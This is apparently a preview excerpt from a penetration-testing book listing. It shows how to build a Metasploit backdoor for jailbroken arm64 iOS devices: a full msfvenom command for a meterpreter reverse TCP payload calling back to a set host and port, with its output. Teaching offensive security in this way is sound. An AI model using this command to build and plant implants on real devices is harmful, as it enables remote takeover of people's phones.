February 2018
Intermediate to advanced
426 pages
11h 3m
English
Metasploit is not restricted to Android devices, if you have a jailbroken arm64 iOS device, you can also create a backdoor with msfvenom, using the apple_ios/aarch64/meterpreter_reverse_tcp payload, and compromise the device:
root@kali:~# msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.216.5 LPORT=443 -f macho -o iOS-backdoorNo platform was selected, choosing Msf::Module::Platform::Apple_iOS from the payloadNo Arch selected, selecting Arch: aarch64 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 692552 bytesFinal size of macho file: 692552 bytes>Saved as: iOS-backdoorroot@kali:~#
Read now
Unlock full access